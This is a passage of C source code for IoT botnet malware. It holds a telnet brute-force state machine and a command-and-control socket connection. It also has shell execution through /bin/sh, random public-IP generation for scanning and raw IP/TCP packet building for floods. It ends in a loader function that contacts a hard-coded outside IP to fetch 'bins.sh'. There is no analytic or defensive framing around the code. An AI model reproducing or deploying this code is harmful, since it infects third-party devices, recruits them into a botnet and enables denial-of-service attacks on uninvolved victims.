245,246,247,248,25,251,252,254,26,32,34,35,36,37,38,39,4,45,47,5,50,51,52,55,56,58,60,62,63,65,66,69,9,98,10,100,102,103,106,112,128,131,135,137,139,141,15,150,152,167,17,171,174,175,176,177,178,179,18,182,187,188,189,193,194,195,197,2,20,213,214,215,217,218,223,225,226,227,228,23,230,233,237,239,28,29,3,31,33,34,35,37,38,4,41,45,46,47,49,50,52,54,55,59,6,62,66,7,70,71,76,8,81,83,84,87,89,9,91,99,106,108,11,110,115,116,117,12,126,127,128,13,150,152,154,158,159,16,160,162,164,165,167,168,170,172,174,175,184,185,19,191,192,193,194,200,202,203,204,208,21,213,214,216,223,225,227,231,237,239,27,28,30,33,45,46,47,48,51,54,59,61,74,76,77,78,81,84,86,87,95,17,37,74,85,155,157,5,88,52,82,11,15,79,214,240,116,96,3,3,100,106,109,110,113,115,139,172,185,2,211,224,231,38,48,67,1,100,101,103,105,106,108,116,12,121,122,123,128,13,131,135,137,139,14,140,141,144,146,148,150,151,153,154,155,157,158,159,16,163,168,169,17,172,175,177,178,179,18,181,182,185,187,188,189,19,191,193,195,196,199,20,200,203,211,212,214,217,220,222,224,226,229,230,231,233,234,236,237,238,243,245,249,25,254,27,32,34,36,37,39,4,41,43,44,46,49,50,52,53,54,57,59,63,64,65,69,75,76,77,78,79,8,80,81,83,84,85,89,90,93,94,95,98,99,117,31,7,96,108,145,159,187,195,196,242,247,71,160,199,0,100,106,107,11,110,111,112,113,115,116,117,119,132,133,136,14,153,158,16,163,2,206,218,22,223,226,228,234,243,244,246,247,248,249,251,254,26,6,73,98,99,186,183,213,215,228,237,75,209,210,215,225,226,227,229,230,234,242,112,156,158,182,186,189,195,2,211,219,223,27,63,71,90,94,10,100,101,102,105,107,11,110,112,115,116,118,120,122,125,126,130,132,133,134,138,144,147,148,152,160,161,162,166,167,169,179,182,184,185,191,195,20,205,207,208,209,210,212,215,218,219,22,220,222,223,226,227,23,236,24,243,245,27,29,34,37,39,4,41,43,45,5,50,51,55,56,58,59,61,62,64,65,67,69,7,71,76,77,8,85,87,9,93,96,98,10,100,102,110,112,113,114,117,118,122,13,130,133,134,137,138,140,160,162,163,164,165,166,168,17,170,173,179,18,180,184,19,2,247,249,252,29,3,49,50,52,54,6,7,85,92,96,97,98,0,10,104,105,106,107,114,117,127,14,163,166,168,174,177,181,182,183,185,200,206,208,214,220,222,224,226,232,233,24,244,246,248,253,28,29,3,30,31,37,38,4,40,44,45,48,50,52,53,55,56,58,59,60,61,62,63,64,68,7,70,8,84,89,99,160,149,234,126,130,148,156,212,224,247,253,157,244,13,15,32,57,9,44,123,151,165,231,50,70,9,168,169,139,237,239,31,10,101,102,104,108,109,112,117,120,121,123,124,126,128,129,133,136,137,138,139,140,144,145,156,157,158,159,161,167,168,172,174,176,178,179,181,182,185,190,191,192,198,200,207,227,233,239,242,244,245,248,250,253,28,34,36,37,38,39,45,52,57,6,62,65,67,70,74,76,78,79,80,81,86,95};
248.  
249.  
250.  
251. #define PHI 0x9e3779b9
252. static uint32_t Q[4096], c = 362436;
253. int dupppp = 0;
254. int rangechoice = 1;
255. int versionnnn = 2;
256. int subversionnnn = 5;
257.  
258. void init_rand(uint32_t x)
259. {
260. int i;
261.  
262. Q[0] = x;
263. Q[1] = x + PHI;
264. Q[2] = x + PHI + PHI;
265.  
266. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
267. }
268.  
269. uint32_t rand_cmwc(void)
270. {
271. uint64_t t, a = 18782LL;
272. static uint32_t i = 4095;
273. uint32_t x, r = 0xfffffffe;
274. i = (i + 1) & 4095;
275. t = a * Q[i] + c;
276. c = (uint32_t)(t >> 32);
277. x = t + c;
278. if (x < c) {
279. x++;
280. c++;
281. }
282. return (Q[i] = r - x);
283. }
284.  
285. void trim(char *str)
286. {
287. int i;
288. int begin = 0;
289. int end = strlen(str) - 1;
290.  
291. while (isspace(str[begin])) begin++;
292.  
293. while ((end >= begin) && isspace(str[end])) end--;
294. for (i = begin; i <= end; i++) str[i - begin] = str[i];
295.  
296. str[i - begin] = '\0';
297. }
298.  
299. static void printchar(unsigned char **str, int c)
300. {
301. if (str) {
302. **str = c;
303. ++(*str);
304. }
305. else (void)write(1, &c, 1);
306. }
307.  
308. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
309. {
310. register int pc = 0, padchar = ' ';
311.  
312. if (width > 0) {
313. register int len = 0;
314. register const unsigned char *ptr;
315. for (ptr = string; *ptr; ++ptr) ++len;
316. if (len >= width) width = 0;
317. else width -= len;
318. if (pad & PAD_ZERO) padchar = '0';
319. }
320. if (!(pad & PAD_RIGHT)) {
321. for ( ; width > 0; --width) {
322. printchar (out, padchar);
323. ++pc;
324. }
325. }
326. for ( ; *string ; ++string) {
327. printchar (out, *string);
328. ++pc;
329. }
330. for ( ; width > 0; --width) {
331. printchar (out, padchar);
332. ++pc;
333. }
334.  
335. return pc;
336. }
337.  
338. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
339. {
340. unsigned char print_buf[PRINT_BUF_LEN];
341. register unsigned char *s;
342. register int t, neg = 0, pc = 0;
343. register unsigned int u = i;
344.  
345. if (i == 0) {
346. print_buf[0] = '0';
347. print_buf[1] = '\0';
348. return prints (out, print_buf, width, pad);
349. }
350.  
351. if (sg && b == 10 && i < 0) {
352. neg = 1;
353. u = -i;
354. }
355.  
356. s = print_buf + PRINT_BUF_LEN-1;
357. *s = '\0';
358.  
359. while (u) {
360. t = u % b;
361. if( t >= 10 )
362. t += letbase - '0' - 10;
363. *--s = t + '0';
364. u /= b;
365. }
366.  
367. if (neg) {
368. if( width && (pad & PAD_ZERO) ) {
369. printchar (out, '-');
370. ++pc;
371. --width;
372. }
373. else {
374. *--s = '-';
375. }
376. }
377.  
378. return pc + prints (out, s, width, pad);
379. }
380.  
381. static int print(unsigned char **out, const unsigned char *format, va_list args )
382. {
383. register int width, pad;
384. register int pc = 0;
385. unsigned char scr[2];
386.  
387. for (; *format != 0; ++format) {
388. if (*format == '%') {
389. ++format;
390. width = pad = 0;
391. if (*format == '\0') break;
392. if (*format == '%') goto out;
393. if (*format == '-') {
394. ++format;
395. pad = PAD_RIGHT;
396. }
397. while (*format == '0') {
398. ++format;
399. pad |= PAD_ZERO;
400. }
401. for ( ; *format >= '0' && *format <= '9'; ++format) {
402. width *= 10;
403. width += *format - '0';
404. }
405. if( *format == 's' ) {
406. register char *s = (char *)va_arg( args, int );
407. pc += prints (out, s?s:"(null)", width, pad);
408. continue;
409. }
410. if( *format == 'd' ) {
411. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
412. continue;
413. }
414. if( *format == 'x' ) {
415. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
416. continue;
417. }
418. if( *format == 'X' ) {
419. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
420. continue;
421. }
422. if( *format == 'u' ) {
423. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
424. continue;
425. }
426. if( *format == 'c' ) {
427. scr[0] = (unsigned char)va_arg( args, int );
428. scr[1] = '\0';
429. pc += prints (out, scr, width, pad);
430. continue;
431. }
432. }
433. else {
434. out:
435. printchar (out, *format);
436. ++pc;
437. }
438. }
439. if (out) **out = '\0';
440. va_end( args );
441. return pc;
442. }
443.  
444. int zprintf(const unsigned char *format, ...)
445. {
446. va_list args;
447. va_start( args, format );
448. return print( 0, format, args );
449. }
450.  
451. int szprintf(unsigned char *out, const unsigned char *format, ...)
452. {
453. va_list args;
454. va_start( args, format );
455. return print( &out, format, args );
456. }
457.  
458.  
459. int sockprintf(int sock, char *formatStr, ...)
460. {
461. unsigned char *textBuffer = malloc(2048);
462. memset(textBuffer, 0, 2048);
463. char *orig = textBuffer;
464. va_list args;
465. va_start(args, formatStr);
466. print(&textBuffer, formatStr, args);
467. va_end(args);
468. orig[strlen(orig)] = '\n';
469. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
470. free(orig);
471. return q;
472. }
473.  
474. static int *fdopen_pids;
475.  
476. int fdpopen(unsigned char *program, register unsigned char *type)
477. {
478. register int iop;
479. int pdes[2], fds, pid;
480.  
481. if (*type != 'r' && *type != 'w' || type[1]) return -1;
482.  
483. if (pipe(pdes) < 0) return -1;
484. if (fdopen_pids == NULL) {
485. if ((fds = getdtablesize()) <= 0) return -1;
486. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
487. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
488. }
489.  
490. switch (pid = vfork())
491. {
492. case -1:
493. close(pdes[0]);
494. close(pdes[1]);
495. return -1;
496. case 0:
497. if (*type == 'r') {
498. if (pdes[1] != 1) {
499. dup2(pdes[1], 1);
500. close(pdes[1]);
501. }
502. close(pdes[0]);
503. } else {
504. if (pdes[0] != 0) {
505. (void) dup2(pdes[0], 0);
506. (void) close(pdes[0]);
507. }
508. (void) close(pdes[1]);
509. }
510. execl("/bin/sh", "sh", "-c", program, NULL);
511. _exit(127);
512. }
513. if (*type == 'r') {
514. iop = pdes[0];
515. (void) close(pdes[1]);
516. } else {
517. iop = pdes[1];
518. (void) close(pdes[0]);
519. }
520. fdopen_pids[iop] = pid;
521. return (iop);
522. }
523.  
524. int fdpclose(int iop)
525. {
526. register int fdes;
527. sigset_t omask, nmask;
528. int pstat;
529. register int pid;
530.  
531. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
532. (void) close(iop);
533. sigemptyset(&nmask);
534. sigaddset(&nmask, SIGINT);
535. sigaddset(&nmask, SIGQUIT);
536. sigaddset(&nmask, SIGHUP);
537. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
538. do {
539. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
540. } while (pid == -1 && errno == EINTR);
541. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
542. fdopen_pids[fdes] = 0;
543. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
544. }
545.  
546. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
547. {
548. int got = 1, total = 0;
549. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
550. return got == 0 ? NULL : buffer;
551. }
552.  
553. static const long hextable[] = {
554. [0 ... 255] = -1,
555. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
556. ['A'] = 10, 11, 12, 13, 14, 15,
557. ['a'] = 10, 11, 12, 13, 14, 15
558. };
559.  
560. long parseHex(unsigned char *hex)
561. {
562. long ret = 0;
563. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
564. return ret;
565. }
566.  
567. int wildString(const unsigned char* pattern, const unsigned char* string) {
568. switch(*pattern)
569. {
570. case '\0': return *string;
571. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
572. case '?': return !(*string && !wildString(pattern+1, string+1));
573. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
574. }
575. }
576.  
577. int getHost(unsigned char *toGet, struct in_addr *i)
578. {
579. struct hostent *h;
580. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
581. return 0;
582. }
583.  
584. void uppercase(unsigned char *str)
585. {
586. while(*str) { *str = toupper(*str); str++; }
587. }
588.  
589. int getBogos(unsigned char *bogomips)
590. {
591. int cmdline = open("/proc/cpuinfo", O_RDONLY);
592. char linebuf[4096];
593. while(fdgets(linebuf, 4096, cmdline) != NULL)
594. {
595. uppercase(linebuf);
596. if(strstr(linebuf, "BOGOMIPS") == linebuf)
597. {
598. unsigned char *pos = linebuf + 8;
599. while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
600. while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
601. if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
602. strcpy(bogomips, pos);
603. close(cmdline);
604. return 0;
605. }
606. memset(linebuf, 0, 4096);
607. }
608. close(cmdline);
609. return 1;
610. }
611.  
612. int getCores()
613. {
614. int totalcores = 0;
615. int cmdline = open("/proc/cpuinfo", O_RDONLY);
616. char linebuf[4096];
617. while(fdgets(linebuf, 4096, cmdline) != NULL)
618. {
619. uppercase(linebuf);
620. if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
621. memset(linebuf, 0, 4096);
622. }
623. close(cmdline);
624. return totalcores;
625.  
626. }
627.  
628. void makeRandomStr(unsigned char *buf, int length)
629. {
630. int i = 0;
631. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
632. }
633.  
634. int recvLine(int socket, unsigned char *buf, int bufsize)
635. {
636. memset(buf, 0, bufsize);
637.  
638. fd_set myset;
639. struct timeval tv;
640. tv.tv_sec = 30;
641. tv.tv_usec = 0;
642. FD_ZERO(&myset);
643. FD_SET(socket, &myset);
644. int selectRtn, retryCount;
645. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
646. while(retryCount < 10)
647. {
648. sockprintf(mainCommSock, "PING");
649.  
650. tv.tv_sec = 30;
651. tv.tv_usec = 0;
652. FD_ZERO(&myset);
653. FD_SET(socket, &myset);
654. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
655. retryCount++;
656. continue;
657. }
658.  
659. break;
660. }
661. }
662.  
663. unsigned char tmpchr;
664. unsigned char *cp;
665. int count = 0;
666.  
667. cp = buf;
668. while(bufsize-- > 1)
669. {
670. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
671. *cp = 0x00;
672. return -1;
673. }
674. *cp++ = tmpchr;
675. if(tmpchr == '\n') break;
676. count++;
677. }
678. *cp = 0x00;
679.  
680. // zprintf("recv: %s\n", cp);
681.  
682. return count;
683. }
684.  
685. struct telstate_t
686. {
687. int fd;
688. unsigned int ip;
689. unsigned char state;
690. unsigned char complete;
691. unsigned char usernameInd;
692. unsigned char passwordInd;
693. unsigned char tempDirInd;
694. unsigned int totalTimeout;
695. unsigned short bufUsed;
696. char *sockbuf;
697. };
698. const char* get_telstate_host(struct telstate_t* telstate)
699. {
700. struct in_addr in_addr_ip;
701. in_addr_ip.s_addr = telstate->ip;
702. return inet_ntoa(in_addr_ip);
703. }
704.  
705. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
706. {
707. int num_bytes, i;
708. memset(buffer, 0, buf_size);
709. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
710.  
711. if(buffer[0] == 0xFF)
712. {
713. negotiate(fd, buffer, 3);
714. }
715.  
716. if(contains_string(buffer, strings))
717. {
718. return 1;
719. }
720.  
721. return 0;
722. }
723. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)
724. {
725. fd_set read_set;
726. struct timeval tv;
727. tv.tv_sec = 0;
728. tv.tv_usec = timeout_usec;
729.  
730. FD_ZERO(&read_set);
731. FD_SET(fd, &read_set);
732.  
733. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
734. return 0;
735.  
736. return recv(fd, buffer, buf_size, 0);
737. }
738. void advance_state(struct telstate_t* telstate, int new_state)
739. {
740. if(new_state == 0)
741. {
742. close(telstate->fd);
743. }
744.  
745. telstate->totalTimeout = 0;
746. telstate->state = new_state;
747. memset((telstate->sockbuf), 0, BUFFER_SIZE);
748. }
749.  
750. void reset_telstate(struct telstate_t* telstate)
751. {
752. advance_state(telstate, 0);
753. telstate->complete = 1;
754. }
755. int contains_success(char* buffer)
756. {
757. return contains_string(buffer, successes);
758. }
759. int contains_fail(char* buffer)
760. {
761. return contains_string(buffer, fails);
762. }
763.  
764. int contains_response(char* buffer)
765. {
766. return contains_success(buffer) || contains_fail(buffer);
767. }
768. int contains_string(char* buffer, char** strings)
769. {
770. int num_strings = 0, i = 0;
771.  
772. for(num_strings = 0; strings[++num_strings] != 0; );
773.  
774. for(i = 0; i < num_strings; i++)
775. {
776. if(strcasestr(buffer, strings[i]))
777. {
778. return 1;
779. }
780. }
781.  
782. return 0;
783. }
784.  
785.  
786. int contains_infectmessage(char* buffer)
787. {
788. return contains_string(buffer, infected);
789. }
790.  
791. int connectTimeout(int fd, char *host, int port, int timeout)
792. {
793. struct sockaddr_in dest_addr;
794. fd_set myset;
795. struct timeval tv;
796. socklen_t lon;
797.  
798. int valopt;
799. long arg = fcntl(fd, F_GETFL, NULL);
800. arg |= O_NONBLOCK;
801. fcntl(fd, F_SETFL, arg);
802.  
803. dest_addr.sin_family = AF_INET;
804. dest_addr.sin_port = htons(port);
805. if(getHost(host, &dest_addr.sin_addr)) return 0;
806. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
807. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
808.  
809. if (res < 0) {
810. if (errno == EINPROGRESS) {
811. tv.tv_sec = timeout;
812. tv.tv_usec = 0;
813. FD_ZERO(&myset);
814. FD_SET(fd, &myset);
815. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
816. lon = sizeof(int);
817. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
818. if (valopt) return 0;
819. }
820. else return 0;
821. }
822. else return 0;
823. }
824.  
825. arg = fcntl(fd, F_GETFL, NULL);
826. arg &= (~O_NONBLOCK);
827. fcntl(fd, F_SETFL, arg);
828.  
829. return 1;
830. }
831.  
832. int listFork()
833. {
834. uint32_t parent, *newpids, i;
835. parent = fork();
836. if (parent <= 0) return parent;
837. numpids++;
838. newpids = (uint32_t*)malloc((numpids + 1) * 4);
839. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
840. newpids[numpids - 1] = parent;
841. free(pids);
842. pids = newpids;
843. return parent;
844. }
845.  
846. int negotiate(int sock, unsigned char *buf, int len)
847. {
848. unsigned char c;
849.  
850. switch (buf[1]) {
851. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
852. case CMD_WILL:
853. case CMD_WONT:
854. case CMD_DO:
855. case CMD_DONT:
856. c = CMD_IAC;
857. send(sock, &c, 1, MSG_NOSIGNAL);
858. if (CMD_WONT == buf[1]) c = CMD_DONT;
859. else if (CMD_DONT == buf[1]) c = CMD_WONT;
860. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
861. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
862. send(sock, &c, 1, MSG_NOSIGNAL);
863. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
864. break;
865.  
866. default:
867. break;
868. }
869.  
870. return 0;
871. }
872.  
873. int matchPrompt(char *bufStr)
874. {
875. char *prompts = ":>%$#\0";
876.  
877. int bufLen = strlen(bufStr);
878. int i, q = 0;
879. for(i = 0; i < strlen(prompts); i++)
880. {
881. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
882. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
883. }
884.  
885. return 0;
886. }
887.  
888. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
889. {
890. int bufferUsed = initialIndex, got = 0, found = 0;
891. fd_set myset;
892. struct timeval tv;
893. tv.tv_sec = timeout;
894. tv.tv_usec = timeoutusec;
895. unsigned char *initialRead = NULL;
896.  
897. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
898. {
899. FD_ZERO(&myset);
900. FD_SET(fd, &myset);
901. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
902. initialRead = buffer + bufferUsed;
903. got = recv(fd, initialRead, 1, 0);
904. if(got == -1 || got == 0) return 0;
905. bufferUsed += got;
906. if(*initialRead == 0xFF)
907. {
908. got = recv(fd, initialRead + 1, 2, 0);
909. if(got == -1 || got == 0) return 0;
910. bufferUsed += got;
911. if(!negotiate(fd, initialRead, 3)) return 0;
912. } else {
913. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
914. }
915. }
916.  
917. if(found) return 1;
918. return 0;
919. }
920.  
921. static uint8_t ipState[5] = {0};
922. in_addr_t getRandomPublicIP()
923. {
924. //if(ipState[1] > 0 && ipState[4] < 255)
925. //{
926. // ipState[4]++;
927. // char ip[16] = {0};
928. // szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
929. // return inet_addr(ip);
930. //}
931.  
932. ipState[0] = rand() % 255;
933. ipState[1] = rand() % 255;
934. ipState[2] = rand() % 255;
935. ipState[3] = rand() % 255;
936.  
937. while(
938. (ipState[0] == 0) ||
939. (ipState[0] == 10) ||
940. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
941. (ipState[0] == 127) ||
942. (ipState[0] == 169 && ipState[1] == 254) ||
943. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
944. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
945. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
946. (ipState[0] == 192 && ipState[1] == 168) ||
947. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
948. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
949. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
950. (ipState[0] == 188 && ipState[1] == 209 && ipState[2] == 52) ||
951. (ipState[0] == 188 && ipState[1] == 209 && ipState[2] == 49) ||
952. (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 190) ||
953. (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 189) ||
954. (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 188) ||
955. (ipState[0] == 185 && ipState[1] == 61 && ipState[2] == 137) ||
956. (ipState[0] == 185 && ipState[1] == 61 && ipState[2] == 136) ||
957. (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 147) ||
958. (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 146) ||
959. (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 145) ||
960. (ipState[0] == 63 && ipState[1] == 141 && ipState[2] == 241) ||
961. (ipState[0] == 69 && ipState[1] == 30 && ipState[2] == 192) ||
962. (ipState[0] == 69 && ipState[1] == 30 && ipState[2] == 244) ||
963. (ipState[0] == 69 && ipState[1] == 197 && ipState[2] == 128) ||
964. (ipState[0] == 162 && ipState[1] == 251 && ipState[2] == 120) ||
965. (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 128) ||
966. (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 180) ||
967. (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 250) ||
968. (ipState[0] == 192 && ipState[1] == 187 && ipState[2] == 113) ||
969. (ipState[0] == 198 && ipState[1] == 204 && ipState[2] == 241) ||
970. (ipState[0] == 204 && ipState[1] == 10 && ipState[2] == 160) ||
971. (ipState[0] == 204 && ipState[1] == 12 && ipState[2] == 192) ||
972. (ipState[0] == 208 && ipState[1] == 110 && ipState[2] == 64) ||
973. (ipState[0] == 208 && ipState[1] == 110 && ipState[2] == 72) ||
974. (ipState[0] == 208 && ipState[1] == 67) ||
975. (ipState[0] == 94 && ipState[1] == 102 && ipState[2] == 48) ||
976. (ipState[0] == 93 && ipState[1] == 174 && ipState[2] == 88) ||
977. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 174) ||
978. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 172) ||
979. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 170) ||
980. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 169) ||
981. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 160) ||
982. (ipState[0] >= 224)
983. )
984. {
985. ipState[0] = rand() % 255;
986. ipState[1] = rand() % 255;
987. ipState[2] = rand() % 255;
988. ipState[3] = rand() % 255;
989. }
990.  
991. char ip[16] = {0};
992. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
993. return inet_addr(ip);
994. }
995.  
996. in_addr_t getRandomPublicIP2()
997. {
998. int range = rand() % (sizeof(oldranges)/sizeof(char *));
999. ipState[0] = oldranges[range];
1000. ipState[1] = oldranges2[range];
1001. ipState[2] = rand() % 255;
1002. ipState[3] = rand() % 255;
1003. char ip[16] = {0};
1004. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
1005. return inet_addr(ip);
1006. }
1007.  
1008. in_addr_t getRandomPublicIPA()
1009. {
1010. int range = rand() % (sizeof(rangesA)/sizeof(char *));
1011. ipState[0] = rangesA[range];
1012. ipState[1] = rand() % 255;
1013. ipState[2] = rand() % 255;
1014. ipState[3] = rand() % 255;
1015. char ip[16] = {0};
1016. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
1017. return inet_addr(ip);
1018. }
1019.  
1020. in_addr_t getRandomPublicIPB()
1021. {
1022. int range = rand() % (sizeof(rangesB1)/sizeof(char *));
1023. ipState[0] = rangesB1[range];
1024. ipState[1] = rangesB2[range];
1025. ipState[2] = rand() % 255;
1026. ipState[3] = rand() % 255;
1027. char ip[16] = {0};
1028. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
1029. return inet_addr(ip);
1030. }
1031.  
1032. in_addr_t getRandomPublicIPC()
1033. {
1034. int range = rand() % (sizeof(rangesC1)/sizeof(char *));
1035. ipState[0] = rangesC1[range];
1036. ipState[1] = rangesC2[range];
1037. ipState[2] = rangesC3[range];
1038. ipState[3] = rand() % 255;
1039. char ip[16] = {0};
1040. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
1041. return inet_addr(ip);
1042. }
1043.  
1044.  
1045. in_addr_t findARandomIP()
1046. {
1047. if(rangechoice < 1 || rangechoice > 5){
1048. return getRandomPublicIP();
1049. }else{
1050. if(rangechoice == 1){
1051. return getRandomPublicIP2();
1052. }else if(rangechoice == 2){
1053. return getRandomPublicIPA();
1054. }else if(rangechoice == 3){
1055. return getRandomPublicIPB();
1056. }else if(rangechoice == 4){
1057. return getRandomPublicIPC();
1058. }else{
1059. return getRandomPublicIP();
1060. }
1061. }
1062. }
1063.  
1064. in_addr_t getRandomIP(in_addr_t netmask)
1065. {
1066. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
1067. return tmp ^ ( rand_cmwc() & ~netmask);
1068. }
1069.  
1070. unsigned short csum (unsigned short *buf, int count)
1071. {
1072. register uint64_t sum = 0;
1073. while( count > 1 ) { sum += *buf++; count -= 2; }
1074. if(count > 0) { sum += *(unsigned char *)buf; }
1075. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
1076. return (uint16_t)(~sum);
1077. }
1078.  
1079. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
1080. {
1081.  
1082. struct tcp_pseudo
1083. {
1084. unsigned long src_addr;
1085. unsigned long dst_addr;
1086. unsigned char zero;
1087. unsigned char proto;
1088. unsigned short length;
1089. } pseudohead;
1090. unsigned short total_len = iph->tot_len;
1091. pseudohead.src_addr=iph->saddr;
1092. pseudohead.dst_addr=iph->daddr;
1093. pseudohead.zero=0;
1094. pseudohead.proto=IPPROTO_TCP;
1095. pseudohead.length=htons(sizeof(struct tcphdr));
1096. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
1097. unsigned short *tcp = malloc(totaltcp_len);
1098. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
1099. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
1100. unsigned short output = csum(tcp,totaltcp_len);
1101. free(tcp);
1102. return output;
1103. }
1104.  
1105. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
1106. {
1107. iph->ihl = 5;
1108. iph->version = 4;
1109. iph->tos = 0;
1110. iph->tot_len = sizeof(struct iphdr) + packetSize;
1111. iph->id = rand_cmwc();
1112. iph->frag_off = 0;
1113. iph->ttl = MAXTTL;
1114. iph->protocol = protocol;
1115. iph->check = 0;
1116. iph->saddr = source;
1117. iph->daddr = dest;
1118. }
1119.  
1120. int sclose(int fd)
1121. {
1122. if(3 > fd) return 1;
1123. close(fd);
1124. return 0;
1125. }
1126. int socket_connect(char *host, in_port_t port){
1127. struct hostent *hp;
1128. struct sockaddr_in addr;
1129. int on = 1, sock;
1130.  
1131. if((hp = gethostbyname(host)) == NULL){
1132. herror("gethostbyname");
1133. exit(1);
1134. }
1135. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
1136. addr.sin_port = htons(port);
1137. addr.sin_family = AF_INET;
1138. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
1139. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
1140.  
1141. if(sock == -1){
1142. perror("setsockopt");
1143. exit(1);
1144. }
1145.  
1146. if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
1147. perror("connect");
1148. exit(1);
1149.  
1150. }
1151. return sock;
1152. }
1153.  
1154. void echoLoader()
1155. {
1156. char buffer[BUFFER_SIZE];
1157. int fd;
1158. fd = socket_connect("50.115.166.17", 80);
1159. write(fd, "GET bins.sh\r\n", strlen("GET bins.sh\r\n")); // write(fd, char[]*, len);
1160. bzero(buffer, BUFFER_SIZE);
1161.  
